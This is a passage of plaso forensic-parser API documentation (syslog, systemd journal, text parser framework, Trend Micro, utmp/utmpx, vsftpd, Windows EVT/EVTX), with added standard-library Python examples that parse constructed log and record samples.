        ('syslog_comment', {{{{{{{{{{{{W:(ABCD..., abcd...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]} Suppress:(":")} Suppress:("---")} SkipTo:(" ---")} Suppress:("---")} LineEnd})]

    NAME = 'syslog'

    ParseRecord(parser_mediator, key, structure)
        Parses a matching entry.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – elements parsed from the file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, lines)
        Verifies that this is a syslog-formatted file.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • lines (str) – one or more lines from the text file.
        Returns: True if this is the correct parser, False otherwise.
        Return type: bool

plaso.parsers.systemd_journal module

Parser for Systemd journal files.

class plaso.parsers.systemd_journal.SystemdJournalEventData
    Bases: plaso.containers.events.EventData

    Systemd journal event data.

    body (str) – message body.
    hostname (str) – hostname.
    pid (int) – process identifier (PID).
    reporter (str) – reporter.

    DATA_TYPE = 'systemd:journal'

class plaso.parsers.systemd_journal.SystemdJournalParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parses Systemd Journal files.

    DATA_FORMAT = 'Systemd journal file'

    classmethod GetFormatSpecification()
        Retrieves the format specification.

        Returns: format specification.
        Return type: FormatSpecification

    NAME = 'systemd_journal'

    ParseFileObject(parser_mediator, file_object)
        Parses a Systemd journal file-like object.

        Parameters:
            • parser_mediator (ParserMediator) – parser mediator.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises: UnableToParseFile – when the header cannot be parsed.

plaso.parsers.text_parser module

This file contains a class to provide a parsing framework to plaso.

This class contains a base framework class for parsing file-like objects, and also some implementations that extend it to provide a more comprehensive parser.

plaso.parsers.text_parser.ConvertTokenToInteger(string, location, tokens)
    Pyparsing parse action callback to convert a token into an integer value.

    Parameters:
        • string (str) – original string.
        • location (int) – location in the string where the token was found.
        • tokens (list[str]) – tokens.
    Returns: integer value or None.
    Return type: int

class plaso.parsers.text_parser.EncodedTextReader(encoding, buffer_size=2048)
    Bases: object

    Encoded text reader.

    ReadLine(file_object)
        Reads a line.

        Parameters: file_object (dfvfs.FileIO) – file-like object.
        Returns: line read from the lines buffer.
        Return type: str

    ReadLines(file_object)
        Reads lines into the lines buffer.

        Parameters: file_object (dfvfs.FileIO) – file-like object.

    Reset()
        Resets the encoded text reader.

    SkipAhead(file_object, number_of_characters)
        Skips ahead a number of characters.

        Parameters:
            • file_object (dfvfs.FileIO) – file-like object.
            • number_of_characters (int) – number of characters.

plaso.parsers.text_parser.PyParseIntCast(string, location, tokens)
    Return an integer from a string.

    This is a pyparsing callback method that converts the matched string into an integer. The method modifies the content of the tokens list and converts them all to an integer value.

    Parameters:
        • string (str) – original string.
        • location (int) – location in the string where the match was made.
        • tokens (list[str]) – extracted tokens, where the string to be converted is stored.

class plaso.parsers.text_parser.PyparsingConstants
    Bases: object

    Constants for pyparsing-based parsers.

    COMMENT_LINE_HASH = {"#" SkipTo:(LineEnd)}
    DATE = Group:({{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)})
    DATE_ELEMENTS = {{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)}
    DATE_TIME = Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}})
    DATE_TIME_MSEC = Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}})
    FOUR_DIGITS = W:(0123...)
    HYPHEN = Suppress:("-")
    INTEGER = W:(0123...)
    IPV4_ADDRESS = IPv4 address
    IPV6_ADDRESS = IPv6 address
    IP_ADDRESS = {IPv4 address | IPv6 address}
    MONTH = W:(ABCD..., abcd...)
    ONE_OR_TWO_DIGITS = W:(0123...)
    ONE_TO_THREE_DIGITS = W:(0123...)
    PID = W:(0123...)
    THREE_DIGITS = W:(0123...)
    THREE_LETTERS = W:(ABCD...)
    TIME = Group:({{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)})
    TIME_ELEMENTS = {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}
    TIME_MSEC = {{Group:({{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}) Suppress:(".")} W:(0123...)}
    TIME_MSEC_ELEMENTS = {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}
    TWO_DIGITS = W:(0123...)

class plaso.parsers.text_parser.PyparsingMultiLineTextParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Multi line text parser interface based on pyparsing.

    BUFFER_SIZE = 2048

    ParseFileObject(parser_mediator, file_object)
        Parses a text file-like object using a pyparsing definition.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.
        Raises: UnableToParseFile – when the file cannot be parsed.

    abstract ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.

        This function takes as an input a parsed pyparsing structure and produces an EventObject if possible from that structure.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – tokens from a parsed log line.
        Returns: event or None.
        Return type: EventObject

    abstract VerifyStructure(parser_mediator, lines)
        Verify the structure of the file and return boolean based on that check.

        This function should read enough text from the text file to confirm that the file is the correct one for this particular parser.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • lines (str) – one or more lines from the text file.
        Returns: True if this is the correct parser, False otherwise.
        Return type: bool

class plaso.parsers.text_parser.PyparsingSingleLineTextParser
    Bases: plaso.parsers.interface.FileObjectParser

    Single line text parser interface based on pyparsing.

    LINE_STRUCTURES = []
    MAXIMUM_CONSECUTIVE_LINE_FAILURES = 20
    MAX_LINE_LENGTH = 400

    ParseFileObject(parser_mediator, file_object)
        Parses a text file-like object using a pyparsing definition.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – file-like object.
        Raises: UnableToParseFile – when the file cannot be parsed.

    abstract ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.

        This function takes as an input a parsed pyparsing structure and produces an EventObject if possible from that structure.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – name of the parsed structure.
            • structure (pyparsing.ParseResults) – tokens from a parsed log line.

    abstract VerifyStructure(parser_mediator, line)
        Verify the structure of the file and return boolean based on that check.

        This function should read enough text from the text file to confirm that the file is the correct one for this particular parser.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – single line from the text file.
        Returns: True if this is the correct parser, False otherwise.
        Return type: bool

plaso.parsers.trendmicroav module

Parser for Trend Micro Antivirus logs.

Trend Micro uses two log files to track the scans (both manual/scheduled and real-time) and the web reputation (network scan/filtering). This module provides a parser for each: OfficeScanVirusDetectionParser for the virus detection log and OfficeScanWebReputationParser for the web reputation log.

class plaso.parsers.trendmicroav.OfficeScanVirusDetectionParser
    Bases: plaso.parsers.trendmicroav.TrendMicroBaseParser

    Parses the Trend Micro Office Scan Virus Detection Log.

    COLUMNS = ['date', 'time', 'threat', 'action', 'scan_type', 'unused1', 'path', 'filename', 'unused2', 'timestamp', 'unused3', 'unused4']
    DATA_FORMAT = 'Trend Micro Office Scan Virus Detection log file'
    MIN_COLUMNS = 8
    NAME = 'trendmicro_vd'

    ParseRow(parser_mediator, row_offset, row)
        Parses a line of the log file and produces events.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • row_offset (int) – offset of the line from which the row was extracted.
            • row (dict[str, str]) – fields of a single row, as specified in COLUMNS.

    VerifyRow(parser_mediator, row)
        Verifies if a line of the file is in the expected format.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
        Returns: True if this is the correct parser, False otherwise.
        Return type: bool

class plaso.parsers.trendmicroav.OfficeScanWebReputationParser
    Bases: plaso.parsers.trendmicroav.TrendMicroBaseParser

    Parses the Trend Micro Office Scan Web Reputation detection log.

    COLUMNS = ('date', 'time', 'block_mode', 'url', 'group_code', 'group_name', 'credibility_rating', 'policy_identifier', 'application_name', 'credibility_score', 'ip', 'threshold', 'timestamp', 'unused')
    DATA_FORMAT = 'Trend Micro Office Web Reputation log file'
    MIN_COLUMNS = 12
    NAME = 'trendmicro_url'

    ParseRow(parser_mediator, row_offset, row)
        Parses a line of the log file and produces events.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • row_offset (int) – offset of the line from which the row was extracted.
            • row (dict[str, str]) – fields of a single row, as specified in COLUMNS.

    VerifyRow(parser_mediator, row)
        Verifies if a line of the file is in the expected format.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
        Returns: True if this is the correct parser, False otherwise.
        Return type: bool

class plaso.parsers.trendmicroav.TrendMicroAVEventData
    Bases: plaso.containers.events.EventData

    Trend Micro AV Log event data.

    action (str) – action.
    filename (str) – filename.
    offset (int) – offset of the line relative to the start of the file, from which the event data was extracted.
    path (str) – path.
    scan_type (str) – scan_type.
    threat (str) – threat.

    DATA_TYPE = 'av:trendmicro:scan'

class plaso.parsers.trendmicroav.TrendMicroBaseParser
    Bases: plaso.parsers.dsv_parser.DSVParser

    Common code for parsing Trend Micro log files.

    The file format is reminiscent of CSV, but is not quite the same; the delimiter is a three-character sequence and there is no provision for quoting or escaping.

    COLUMNS = ()
    DELIMITER = '<;>'
    MIN_COLUMNS = None

class plaso.parsers.trendmicroav.TrendMicroUrlEventData
    Bases: plaso.containers.events.EventData

    Trend Micro Web Reputation Log event data.

    application_name (str) – application name.
    block_mode (str) – operation mode.
    credibility_rating (int) – credibility rating.
    credibility_score (int) – credibility score.
    group_code (str) – group code.
    group_name (str) – group name.
    ip (str) – IP address.
    offset (int) – offset of the line relative to the start of the file, from which the event data was extracted.
    policy_identifier (int) – policy identifier.
    threshold (int) – threshold value.
    url (str) – accessed URL.

    DATA_TYPE = 'av:trendmicro:webrep'

plaso.parsers.utmp module

Parser for Linux utmp files.

class plaso.parsers.utmp.UtmpEventData
    Bases: plaso.containers.events.EventData

    Linux libc6 utmp event data.

    exit_status (int) – exit status.
    hostname (str) – hostname or IP address.
    ip_address (str) – IP address from the connection.
    offset (int) – offset of the utmp record relative to the start of the file, from which the event data was extracted.
    pid (int) – process identifier (PID).
    terminal_identifier (int) – inittab identifier.
    terminal (str) – type of terminal.
    type (int) – type of login.
    username (str) – user name.

    DATA_TYPE = 'linux:utmp:event'

class plaso.parsers.utmp.UtmpParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parser for Linux libc6 utmp files.

    DATA_FORMAT = 'Linux libc6 utmp file'
    NAME = 'utmp'

    ParseFileObject(parser_mediator, file_object)
        Parses a utmp file-like object.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises: UnableToParseFile – when the file cannot be parsed.
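The fields listed for UtmpEventData map directly onto the fixed-size struct utmp record that UtmpParser reads through dtfabric. The following standard-library parser is an added example, not plaso code: it decodes the 384-byte glibc layout from <utmp.h> on x86_64 Linux (the same layout is used by wtmp and btmp) and returns the same field names, except that terminal_identifier is returned as the raw ut_id text rather than plaso's integer form. Both records are constructed; a buffer whose length is not a multiple of the record size is rejected rather than silently truncated, which is the usual sign of a damaged file or of a 32-bit layout.

```python
"""Parse glibc (x86_64 Linux) utmp records with the standard library.
Added example, not plaso code. The two sample records are constructed."""
import ipaddress
import struct
from datetime import datetime, timezone

# struct utmp (glibc, x86_64): ut_type, 2 pad bytes, ut_pid, ut_line[32],
# ut_id[4], ut_user[32], ut_host[256], ut_exit {e_termination, e_exit},
# ut_session, ut_tv {tv_sec, tv_usec} as two int32, ut_addr_v6[4], 20 unused.
UTMP_STRUCT = struct.Struct('<hxxi32s4s32s256shhiii16s20x')
UTMP_RECORD_SIZE = UTMP_STRUCT.size  # 384

UT_TYPES = {0: 'EMPTY', 1: 'RUN_LVL', 2: 'BOOT_TIME', 3: 'NEW_TIME',
            4: 'OLD_TIME', 5: 'INIT_PROCESS', 6: 'LOGIN_PROCESS',
            7: 'USER_PROCESS', 8: 'DEAD_PROCESS', 9: 'ACCOUNTING'}


def _cstring(raw):
    """Decodes a NUL-padded char array, tolerating invalid UTF-8."""
    return raw.split(b'\x00', 1)[0].decode('utf-8', errors='replace')


def _address(raw):
    """ut_addr_v6 carries an IPv4 address in its first 4 bytes (rest zero)
    or a full IPv6 address; all zeros means no address was recorded."""
    if raw == bytes(16):
        return None
    if raw[4:] == bytes(12):
        return str(ipaddress.IPv4Address(raw[:4]))
    return str(ipaddress.IPv6Address(raw))


def parse_utmp_record(data, offset=0):
    """Parses the record at offset into a dict of event fields."""
    (ut_type, pid, line, ident, user, host, e_termination, e_exit, session,
     tv_sec, tv_usec, addr) = UTMP_STRUCT.unpack_from(data, offset)
    timestamp = datetime.fromtimestamp(tv_sec, timezone.utc)
    return {
        'offset': offset,
        'type': ut_type,
        'type_name': UT_TYPES.get(ut_type, 'UNKNOWN'),
        'pid': pid,
        'terminal': _cstring(line),
        'terminal_identifier': _cstring(ident),
        'username': _cstring(user),
        'hostname': _cstring(host),
        'exit_status': (e_termination, e_exit),
        'session': session,
        'ip_address': _address(addr),
        'timestamp': timestamp.replace(microsecond=tv_usec),
    }


def parse_utmp_file(data):
    """Walks a utmp, wtmp or btmp buffer; a trailing partial record means
    the file is truncated or is not a 64-bit glibc utmp file."""
    if len(data) % UTMP_RECORD_SIZE:
        raise ValueError('data is not a multiple of %d bytes' % UTMP_RECORD_SIZE)
    return [parse_utmp_record(data, offset)
            for offset in range(0, len(data), UTMP_RECORD_SIZE)]


def build_record(ut_type, pid, line, ident, user, host, tv_sec, tv_usec=0,
                 addr=bytes(16)):
    """Packs one record; only used to construct the sample input below."""
    return UTMP_STRUCT.pack(ut_type, pid, line.encode(), ident.encode(),
                            user.encode(), host.encode(), 0, 0, 0,
                            tv_sec, tv_usec, addr)


# Constructed sample: a reboot record followed by an SSH login on pts/0.
LOGIN_ADDR = ipaddress.IPv4Address('203.0.113.7').packed + bytes(12)
SAMPLE_UTMP = (
    build_record(2, 0, '~', '~~', 'reboot', '5.4.0-generic', 1622937600)
    + build_record(7, 4242, 'pts/0', 'ts/0', 'alice', '203.0.113.7',
                   1622941200, 123456, LOGIN_ADDR))

if __name__ == '__main__':
    for record in parse_utmp_file(SAMPLE_UTMP):
        print(record['type_name'], record['username'], record['terminal'],
              record['hostname'], record['ip_address'], record['timestamp'])
```

When run against a real /var/log/wtmp, records of type USER_PROCESS with a non-empty ip_address are the remote logins; their hostname field is whatever the login program wrote and should not be trusted over the packed address.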

plaso.parsers.utmpx module

Parser for utmpx files.

class plaso.parsers.utmpx.UtmpxMacOSEventData
    Bases: plaso.containers.events.EventData

    MacOS utmpx event data.

    hostname (str) – hostname or IP address.
    offset (int) – offset of the utmpx record relative to the start of the file, from which the event data was extracted.
    pid (int) – process identifier (PID).
    terminal (str) – name of the terminal.
    terminal_identifier (int) – inittab identifier.
    type (int) – type of login.
    username (str) – user name.

    DATA_TYPE = 'mac:utmpx:event'

class plaso.parsers.utmpx.UtmpxParser
    Bases: plaso.parsers.interface.FileObjectParser, plaso.lib.dtfabric_helper.DtFabricHelper

    Parser for Mac OS X 10.5 utmpx files.

    DATA_FORMAT = 'Mac OS X 10.5 utmpx file'

    classmethod GetFormatSpecification()
        Retrieves the format specification.

        Returns: format specification.
        Return type: FormatSpecification

    NAME = 'utmpx'

    ParseFileObject(parser_mediator, file_object)
        Parses a utmpx file-like object.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.
        Raises: UnableToParseFile – when the file cannot be parsed.

plaso.parsers.vsftpd module

Parser for vsftpd Logs.

class plaso.parsers.vsftpd.VsftpdEventData
    Bases: plaso.containers.events.EventData

    vsftpd Log event data.

    text (str) – vsftpd log message.

    DATA_TYPE = 'vsftpd:log'

class plaso.parsers.vsftpd.VsftpdLogParser
    Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser

    Parses a vsftpd log.

    DATA_FORMAT = 'vsftpd log file'
    LINE_STRUCTURES = [('logline', {Group:({{{{{{{{W:(ABCD...) W:(ABCD...)} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} W:(0123...)}) SkipTo:(lineEnd)})]
    NAME = 'vsftpd'

    ParseRecord(parser_mediator, key, structure)
        Parses a log record structure and produces events.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • key (str) – identifier of the structure of tokens.
            • structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
        Raises: ParseError – when the structure type is unknown.

    VerifyStructure(parser_mediator, line)
        Verify that this file is a vsftpd log file.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • line (str) – line from a text file.
        Returns: True if the line is in the expected format, False if not.
        Return type: bool
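The contract of PyparsingSingleLineTextParser described in plaso.parsers.text_parser above (LINE_STRUCTURES tried in order, VerifyStructure on the first line, ParseRecord per matched structure, MAX_LINE_LENGTH and MAXIMUM_CONSECUTIVE_LINE_FAILURES as limits) is easiest to see in a small reimplementation, and VsftpdLogParser is the simplest concrete parser on this page to put on top of it: its single 'logline' structure is a ctime()-style timestamp (weekday, month, day, time, year) followed by free text. The following added example, not plaso code, serves both sections. Regular expressions stand in for pyparsing so it runs on the standard library; the attribute and hook names are the documentation's, while the handling of an over-long line and of the consecutive-failure limit is this example's own choice. The log lines are constructed.

```python
"""A single-line text parser in the shape of PyparsingSingleLineTextParser,
with a vsftpd log parser on top. Added example, not plaso code: regular
expressions stand in for pyparsing so it runs on the standard library alone.
Attribute and hook names follow the documentation; what happens on an
over-long line or at the failure limit is this example's own choice."""
import re
from datetime import datetime


class UnableToParseFile(Exception):
    """The first line does not look like this parser's format."""


class ParseError(Exception):
    """ParseRecord was handed a structure key it does not know."""


class SingleLineTextParser:
    LINE_STRUCTURES = []                  # [(key, compiled regex), ...]
    MAX_LINE_LENGTH = 400
    MAXIMUM_CONSECUTIVE_LINE_FAILURES = 20

    def VerifyStructure(self, line):
        raise NotImplementedError

    def ParseRecord(self, key, match):
        raise NotImplementedError

    def ParseLines(self, lines):
        """Verifies the first line, then matches each line against
        LINE_STRUCTURES in order. Returns (events, errors); stops after
        too many consecutive lines that match no structure."""
        if not lines or not self.VerifyStructure(lines[0]):
            raise UnableToParseFile('first line is not in the expected format')
        events, errors, failures = [], [], 0
        for number, line in enumerate(lines, 1):
            if len(line) > self.MAX_LINE_LENGTH:
                errors.append('line %d exceeds MAX_LINE_LENGTH' % number)
                continue
            for key, pattern in self.LINE_STRUCTURES:
                match = pattern.match(line)
                if match:
                    events.append(self.ParseRecord(key, match))
                    failures = 0
                    break
            else:
                failures += 1
                errors.append('line %d matches no structure' % number)
                if failures >= self.MAXIMUM_CONSECUTIVE_LINE_FAILURES:
                    errors.append('aborted after %d consecutive failures'
                                  % failures)
                    break
        return events, errors


class VsftpdLogParser(SingleLineTextParser):
    """vsftpd.log: ctime()-style timestamp, then free text, for example
    'Sun Jun  6 22:59:59 2021 [pid 3694] CONNECT: Client "203.0.113.7"'."""
    MONTHS = {name: number for number, name in enumerate(
        ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
         'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'], 1)}
    LINE_STRUCTURES = [('logline', re.compile(
        r'^(?P<weekday>[A-Z][a-z]{2}) (?P<month>%s) +(?P<day>\d{1,2}) '
        r'(?P<hour>\d{2}):(?P<minute>\d{2}):(?P<second>\d{2}) '
        r'(?P<year>\d{4}) ?(?P<text>.*)$' % '|'.join(MONTHS)))]

    def VerifyStructure(self, line):
        return self.LINE_STRUCTURES[0][1].match(line) is not None

    def ParseRecord(self, key, match):
        if key != 'logline':
            raise ParseError('unknown structure: %s' % key)
        when = datetime(int(match['year']), self.MONTHS[match['month']],
                        int(match['day']), int(match['hour']),
                        int(match['minute']), int(match['second']))
        return {'data_type': 'vsftpd:log', 'timestamp': when.isoformat(),
                'text': match['text']}


# Constructed sample: three valid lines around one damaged line.
SAMPLE_LOG = '''\
Sun Jun  6 22:59:59 2021 [pid 3694] CONNECT: Client "203.0.113.7"
Sun Jun  6 23:00:01 2021 [pid 3693] [alice] OK LOGIN: Client "203.0.113.7"
this line was damaged and carries no timestamp
Sun Jun  6 23:00:05 2021 [pid 3695] [alice] OK DOWNLOAD: Client "203.0.113.7", "/home/alice/.ssh/id_rsa", 2602 bytes, 91.23Kbyte/sec
'''

if __name__ == '__main__':
    events, errors = VsftpdLogParser().ParseLines(SAMPLE_LOG.splitlines())
    for event in events:
        print(event['timestamp'], event['text'])
    print(errors)
```

The damaged third line produces an error entry but does not stop extraction; only a run of MAXIMUM_CONSECUTIVE_LINE_FAILURES unmatched lines does, which is what keeps a parser from chewing through a file that merely started with one lucky match. Note that the vsftpd timestamp carries no time zone, so the event times are local to the server that wrote the log.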

plaso.parsers.winevt module

Parser for Windows EventLog (EVT) files.

class plaso.parsers.winevt.WinEvtParser
    Bases: plaso.parsers.interface.FileObjectParser

    Parses Windows EventLog (EVT) files.

    DATA_FORMAT = 'Windows EventLog (EVT) file'

    classmethod GetFormatSpecification()
        Retrieves the format specification.

        Returns: format specification.
        Return type: FormatSpecification

    NAME = 'winevt'

    ParseFileObject(parser_mediator, file_object)
        Parses a Windows EventLog (EVT) file-like object.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.

class plaso.parsers.winevt.WinEvtRecordEventData
    Bases: plaso.containers.events.EventData

    Windows EventLog (EVT) record event data.

    computer_name (str) – computer name stored in the event record.
    event_category (int) – event category.
    event_identifier (int) – event identifier.
    event_type (int) – event type.
    facility (int) – event facility.
    message_identifier (int) – event message identifier.
    offset (int) – offset of the EVT record relative to the start of the file, from which the event data was extracted.
    record_number (int) – event record number.
    recovered (bool) – True if the record was recovered.
    severity (int) – event severity.
    source_name (str) – name of the event source.
    strings (list[str]) – event strings.
    user_sid (str) – user security identifier (SID) stored in the event record.

    DATA_TYPE = 'windows:evt:record'

plaso.parsers.winevtx module

Parser for Windows XML EventLog (EVTX) files.

class plaso.parsers.winevtx.WinEvtxParser
    Bases: plaso.parsers.interface.FileObjectParser

    Parses Windows XML EventLog (EVTX) files.

    DATA_FORMAT = 'Windows XML EventLog (EVTX) file'

    classmethod GetFormatSpecification()
        Retrieves the format specification.

        Returns: format specification.
        Return type: FormatSpecification

    NAME = 'winevtx'

    ParseFileObject(parser_mediator, file_object)
        Parses a Windows XML EventLog (EVTX) file-like object.

        Parameters:
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • file_object (dfvfs.FileIO) – a file-like object.

class plaso.parsers.winevtx.WinEvtxRecordEventData
    Bases: plaso.containers.events.EventData

    Windows XML EventLog (EVTX) record event data.

    computer_name (str) – computer name stored in the event record.
    event_identifier (int) – event identifier.
    event_level (int) – event level.
    message_identifier (int) – event message identifier.
    offset (int) – offset of the EVTX record relative to the start of the file, from which the event data was extracted.
    record_number (int) – event record number.
    recovered (bool) – True if the record was recovered.
    source_name (str) – name of the event source.
    strings (list[str]) – event strings.
    user_sid (str) – user security identifier (SID) stored in the event record.
    xml_string (str) – XML representation of the event.

    DATA_TYPE = 'windows:evtx:record'
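The EVT and EVTX record event data above share most of their fields, and for the classic EVT format the fields that are derived rather than stored (event_identifier, facility, severity and message_identifier, all taken from one 32-bit EventID) are best understood by decoding a record by hand. The following standard-library parser is an added example, not plaso code: plaso reads EVT through pyevt and EVTX through pyevtx, and EVTX, being binary XML, is not reproduced here. It decodes the EVENTLOGRECORD layout from winnt.h; the EventID bit layout (low 16 bits event identifier, bits 16 to 27 facility, top two bits severity) is the Windows one, and the mapping onto plaso's field names is this example's reading of the documentation. Every offset in the header is bounds-checked against the record before use, because a crafted record can otherwise point a reader outside the record. The records are constructed.

```python
"""Classic Windows EventLog (EVT) record parser, standard library only.
Added example, not plaso code (plaso reads EVT/EVTX through pyevt/pyevtx).
Decodes the winnt.h EVENTLOGRECORD layout into the WinEvtRecordEventData
fields, including the values packed into the 32-bit EventID."""
import struct

# EVENTLOGRECORD header: Length, Reserved ('LfLe'), RecordNumber, TimeGenerated,
# TimeWritten, EventID, EventType, NumStrings, EventCategory, ReservedFlags,
# ClosingRecordNumber, StringOffset, UserSidLength, UserSidOffset, DataLength,
# DataOffset; SourceName, ComputerName, SID, strings and data follow it.
HEADER = struct.Struct('<IIIIIIHHHHIIIIII')
SIGNATURE = 0x654C664C  # b'LfLe' read as a little-endian DWORD

def _utf16z(buf, pos):
    """Reads a NUL-terminated UTF-16LE string; returns (text, next_pos)."""
    end = pos
    while end + 1 < len(buf) and buf[end:end + 2] != b'\x00\x00':
        end += 2
    if end + 1 >= len(buf):
        raise ValueError('unterminated UTF-16 string at %d' % pos)
    return buf[pos:end].decode('utf-16-le'), end + 2

def decode_sid(raw):
    """Converts a binary SID to its S-<rev>-<authority>-<sub>... form."""
    if len(raw) < 8 or len(raw) != 8 + 4 * raw[1]:
        raise ValueError('malformed SID')
    subs = struct.unpack_from('<%dI' % raw[1], raw, 8)
    return 'S-%d-%d-%s' % (raw[0], int.from_bytes(raw[2:8], 'big'),
                           '-'.join(str(s) for s in subs))

def parse_evt_record(data, offset=0):
    """Parses one record at offset; raises ValueError on corruption."""
    (length, magic, number, _generated, written, event_id, event_type,
     num_strings, category, _flags, _closing, string_offset, sid_length,
     sid_offset, data_length, data_offset) = HEADER.unpack_from(data, offset)
    if magic != SIGNATURE:
        raise ValueError('bad signature at offset %d' % offset)
    if length < HEADER.size + 4 or offset + length > len(data):
        raise ValueError('record at offset %d runs past the buffer' % offset)
    record = data[offset:offset + length]
    if struct.unpack_from('<I', record, length - 4)[0] != length:
        raise ValueError('trailing length mismatch at offset %d' % offset)
    for start, size in ((sid_offset, sid_length), (data_offset, data_length)):
        if size and (start < HEADER.size or start + size > length - 4):
            raise ValueError('field outside record at offset %d' % offset)
    if not HEADER.size <= string_offset <= length - 4:
        raise ValueError('string offset outside record at offset %d' % offset)
    source_name, pos = _utf16z(record, HEADER.size)
    computer_name, _ = _utf16z(record, pos)
    strings, pos = [], string_offset
    for _ in range(num_strings):
        text, pos = _utf16z(record, pos)
        strings.append(text)
    sid = record[sid_offset:sid_offset + sid_length]
    return {
        'offset': offset, 'record_number': number, 'event_type': event_type,
        'time_written': written,                 # POSIX timestamp
        'message_identifier': event_id,          # full 32-bit EventID
        'event_identifier': event_id & 0xFFFF,   # the ID analysts quote
        'facility': (event_id >> 16) & 0x0FFF, 'severity': event_id >> 30,
        'event_category': category, 'source_name': source_name,
        'computer_name': computer_name, 'strings': strings,
        'user_sid': decode_sid(sid) if sid_length else None}

def parse_evt_records(data, offset=0):
    """Walks consecutive records by their Length until the buffer ends."""
    records = []
    while offset + HEADER.size <= len(data):
        records.append(parse_evt_record(data, offset))
        offset += struct.unpack_from('<I', data, offset)[0]
    return records

def build_evt_record(number, timestamp, event_id, event_type, category,
                     source, computer, sid, strings):
    """Packs a record without binary data; constructs sample input only."""
    body = bytearray((source + '\x00' + computer + '\x00').encode('utf-16-le'))
    body += bytes(-len(body) % 4)               # SID starts DWORD-aligned
    sid_offset = HEADER.size + len(body)
    body += sid
    string_offset = HEADER.size + len(body)
    for text in strings:
        body += (text + '\x00').encode('utf-16-le')
    data_offset = HEADER.size + len(body)
    body += bytes(-len(body) % 4)               # pad to a DWORD boundary
    length = HEADER.size + len(body) + 4
    header = HEADER.pack(length, SIGNATURE, number, timestamp, timestamp,
                         event_id, event_type, len(strings), category, 0, 0,
                         string_offset, len(sid), sid_offset, 0, data_offset)
    return header + bytes(body) + struct.pack('<I', length)

# Constructed sample: a service-start record, then an audit record carrying
# S-1-5-21-1004336348-1177238915-682003330-500 (revision 1, authority 5).
ADMIN_SID = (b'\x01\x05' + (5).to_bytes(6, 'big')
             + struct.pack('<5I', 21, 1004336348, 1177238915, 682003330, 500))
SAMPLE_EVT = (
    build_evt_record(1, 1622937600, 6005, 4, 0, 'EventLog', 'WORKSTATION1', b'', [])
    + build_evt_record(2, 1622941200, 0x40000210, 8, 2, 'Security', 'WORKSTATION1',
                       ADMIN_SID, ['Administrator', 'WORKSTATION1', '(0x0,0x3E7)', '2']))
```

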